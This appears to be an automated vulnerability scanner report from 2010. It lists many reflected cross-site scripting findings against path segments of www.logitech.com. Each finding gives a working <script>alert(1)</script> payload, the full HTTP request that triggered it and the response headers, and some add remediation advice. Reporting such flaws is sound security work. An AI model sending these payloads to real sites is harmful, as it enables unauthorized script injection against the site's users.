<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f661"><script>alert(1)</script>bba80f810a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us3f661"><script>alert(1)</script>bba80f810a1/478/3369 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a99</script><script>alert(1)</script>7655cd4f704 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478d2a99</script><script>alert(1)</script>7655cd4f704/3369 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 740e3"><script>alert(1)</script>0e1faca3165 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478740e3"><script>alert(1)</script>0e1faca3165/3369 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1db"><script>alert(1)</script>177f2a450 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/33698f1db"><script>alert(1)</script>177f2a450 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb85d</script><script>alert(1)</script>125d1b89217 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3369cb85d</script><script>alert(1)</script>125d1b89217 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb05c</script><script>alert(1)</script>1680880bae4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fb05c</script><script>alert(1)</script>1680880bae4/478/3370 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6f4a"%3b54c5e73aeba was submitted in the REST URL parameter 1. This input was echoed as b6f4a";54c5e73aeba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usb6f4a"%3b54c5e73aeba/478/3370 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f565e"><script>alert(1)</script>f5d770c18e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf565e"><script>alert(1)</script>f5d770c18e/478/3370 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e82aa"><script>alert(1)</script>7ca3044e94c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478e82aa"><script>alert(1)</script>7ca3044e94c/3370 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e36</script><script>alert(1)</script>f52f4481214 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/47832e36</script><script>alert(1)</script>f52f4481214/3370 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 888b3</script><script>alert(1)</script>e00a26bdff6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3370888b3</script><script>alert(1)</script>e00a26bdff6 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66e04"><script>alert(1)</script>e97aa14cf17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/337066e04"><script>alert(1)</script>e97aa14cf17 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50235"><script>alert(1)</script>d3c5fd91a0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us50235"><script>alert(1)</script>d3c5fd91a0c/478/3372 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7ab4</script><script>alert(1)</script>1e6e5097908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a7ab4</script><script>alert(1)</script>1e6e5097908/478/3372 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74187"%3bc4d46531841 was submitted in the REST URL parameter 1. This input was echoed as 74187";c4d46531841 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us74187"%3bc4d46531841/478/3372 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac6ca</script><script>alert(1)</script>c35b46da7f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478ac6ca</script><script>alert(1)</script>c35b46da7f6/3372 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c43"><script>alert(1)</script>5fac7385f87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/47810c43"><script>alert(1)</script>5fac7385f87/3372 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26de9</script><script>alert(1)</script>0ee1464ef4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/337226de9</script><script>alert(1)</script>0ee1464ef4c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed4d"><script>alert(1)</script>127cd3d930b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3372fed4d"><script>alert(1)</script>127cd3d930b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54743</script><script>alert(1)</script>ff794be83dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /54743</script><script>alert(1)</script>ff794be83dd/478/3417 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f200f"%3b510d9aa0e6a was submitted in the REST URL parameter 1. This input was echoed as f200f";510d9aa0e6a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usf200f"%3b510d9aa0e6a/478/3417 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0ab"><script>alert(1)</script>2dffc00b755 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usfb0ab"><script>alert(1)</script>2dffc00b755/478/3417 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2bef</script><script>alert(1)</script>312db205e39 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478e2bef</script><script>alert(1)</script>312db205e39/3417 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edee9"><script>alert(1)</script>f860f288bfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478edee9"><script>alert(1)</script>f860f288bfa/3417 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dbf4</script><script>alert(1)</script>dca223568b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/34173dbf4</script><script>alert(1)</script>dca223568b7 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5fd"><script>alert(1)</script>df194a579a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/34172d5fd"><script>alert(1)</script>df194a579a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c101e"><script>alert(1)</script>7aa7e47ede0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usc101e"><script>alert(1)</script>7aa7e47ede0/478/3525 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0878</script><script>alert(1)</script>d1cc9504ce7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a0878</script><script>alert(1)</script>d1cc9504ce7/478/3525 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
